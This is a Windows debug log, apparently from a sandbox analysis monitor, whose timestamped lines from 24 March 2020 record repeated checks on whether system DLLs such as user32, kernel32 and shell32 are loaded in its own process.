2020-03-24 10:13:53,552 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,552 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,552 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,566 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,566 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,566 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,566 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,566 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,582 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,582 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,582 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,598 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\sechost.dll
2020-03-24 10:13:53,598 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sechost.dll
2020-03-24 10:13:53,598 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:13:53,598 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:13:53,614 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:13:53,614 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:13:53,614 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:13:53,630 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:53,644 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:53,644 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\cryptbase.dll
2020-03-24 10:13:53,644 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cryptbase.dll
2020-03-24 10:13:53,644 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\ole32.dll
2020-03-24 10:13:53,661 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ole32.dll
2020-03-24 10:13:53,661 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:53,661 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:53,661 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,676 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,676 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,691 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,691 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,707 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,707 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,723 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,723 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,723 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,723 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,723 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,739 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,739 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:53,739 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,739 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,753 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:53,753 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,753 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:53,769 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:53,769 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:53,769 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:53,769 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:53,786 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,786 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,786 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:53,786 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,801 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,801 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,801 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,816 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:53,816 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:53,816 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:53,832 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:53,832 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:53,832 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,848 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:53,848 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,848 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,848 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,864 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,864 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:53,864 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,864 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:53,878 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:53,878 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:53,878 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,894 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,894 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:53,894 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:53,910 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:53,910 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:53,910 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:53,910 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:53,910 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:53,926 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,926 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:53,926 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:53,926 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:53,926 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:53,941 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:53,941 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:53,941 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,941 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,957 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,957 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:53,957 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,957 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,973 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,973 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,973 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,973 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,987 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,987 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:53,987 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,003 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,003 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,003 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,019 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:54,019 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:54,019 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:54,035 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:54,035 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,035 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:54,035 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,051 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,051 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,065 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,065 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,065 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,082 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,082 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,082 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,098 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:54,098 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,098 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,098 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,112 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,112 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,112 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,112 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:54,112 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,112 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,128 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,128 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,128 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,144 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,144 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:54,144 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:54,144 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:54,160 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:54,160 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,160 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,176 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,176 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:54,190 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:54,190 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:54,190 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:54,190 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:54,207 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:54,207 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:54,207 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:54,221 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:54,221 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:13:54,221 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,237 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,237 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:13:54,237 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,253 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,253 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:13:54,253 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:13:54,253 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:13:54,253 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:13:54,269 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:13:54,269 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:54,269 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:54,285 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,285 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:54,285 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:54,285 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:13:54,299 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:13:54,299 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:54,299 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:54,299 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:54,315 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:54,315 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:54,315 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:54,332 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:13:54,346 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,346 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,362 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,362 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:54,362 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:13:54,394 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:13:54,394 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,410 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,410 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:13:54,410 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,410 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,424 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:13:54,424 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,424 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,424 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,440 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,440 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,440 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:54,456 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:54,456 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:54,471 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:54,471 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:54,471 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:54,471 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:54,487 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:54,487 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\psapi.dll
